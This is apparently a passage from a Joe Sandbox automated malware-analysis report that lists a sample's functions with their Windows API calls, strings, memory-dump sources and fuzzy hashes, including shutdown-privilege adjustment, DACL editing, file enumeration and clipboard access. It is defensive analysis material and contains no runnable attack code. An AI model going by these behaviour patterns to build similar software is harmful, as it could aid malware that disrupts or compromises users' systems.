                                                            • __swprintf.LIBCMT ref: 00478A79
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                            • __swprintf.LIBCMT ref: 00478AA7
                                                            • __swprintf.LIBCMT ref: 00478AD5
                                                            • __swprintf.LIBCMT ref: 00478B03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 999945258-2428617273
                                                            • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                            • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                            • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                            • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                            Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                            • __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscpy.LIBCMT ref: 004034A7
                                                            • _wcscat.LIBCMT ref: 004034BC
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                            • _wcscpy.LIBCMT ref: 004035A0
                                                            • _wcslen.LIBCMT ref: 00403623
                                                            • _wcslen.LIBCMT ref: 0040367D
                                                            Strings
                                                            • Unterminated string, xrefs: 00428348
                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                            • Error opening the file, xrefs: 00428231
                                                            • _, xrefs: 0040371C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                            • API String ID: 3393021363-188983378
                                                            • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                            • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                            • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                            • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                            Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                            • FindClose.KERNEL32(00000000), ref: 00431B20
                                                            • FindClose.KERNEL32(00000000), ref: 00431B34
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                            Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                            • __swprintf.LIBCMT ref: 00431C2E
                                                            • _wcslen.LIBCMT ref: 00431C3A
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2192556992-3457252023
                                                            • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                            • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                            • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                            Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                            • __swprintf.LIBCMT ref: 004722B9
                                                            • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                            • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                            • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                            • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                            • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                            • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                            • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FolderPath$LocalTime__swprintf
                                                            • String ID: %.3d
                                                            • API String ID: 3337348382-986655627
                                                            • Opcode ID: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                            • Opcode Fuzzy Hash: 7886e1de9339dcccb7d90e6fd0fd2fa7ca800526018001cd1a68e58c6d42a46d
                                                            • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                            Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                            • FindClose.KERNEL32(00000000), ref: 0044291C
                                                            • FindClose.KERNEL32(00000000), ref: 00442930
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                            • FindClose.KERNEL32(00000000), ref: 004429D4
                                                              • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                            • FindClose.KERNEL32(00000000), ref: 004429E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 2640511053-438819550
                                                            • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                            • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                            • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                            Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                            • GetLastError.KERNEL32 ref: 00433414
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                            • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                            • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                            • String ID: SeShutdownPrivilege
                                                            • API String ID: 2938487562-3733053543
                                                            • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                            • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                            • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                            Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                              • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                              • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                              • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                            • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                            • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                            • CopySid.ADVAPI32(00000000), ref: 00446271
                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                            • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                            • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                            Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __swprintf.LIBCMT ref: 00433073
                                                            • __swprintf.LIBCMT ref: 00433085
                                                            • __wcsicoll.LIBCMT ref: 00433092
                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                            • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                            • LockResource.KERNEL32(00000000), ref: 004330CA
                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                            • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                            • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                            • LockResource.KERNEL32(?), ref: 00433120
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                            • String ID:
                                                            • API String ID: 1158019794-0
                                                            • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                            • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                            • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                            Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                            • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                            • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                            Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                            • GetLastError.KERNEL32 ref: 0045D6BF
                                                            • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                            • API String ID: 4194297153-14809454
                                                            • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                            • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                            • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                            Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_strncmp
                                                            • String ID: @oH$\$^$h
                                                            • API String ID: 2175499884-3701065813
                                                            • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                            • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                            • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
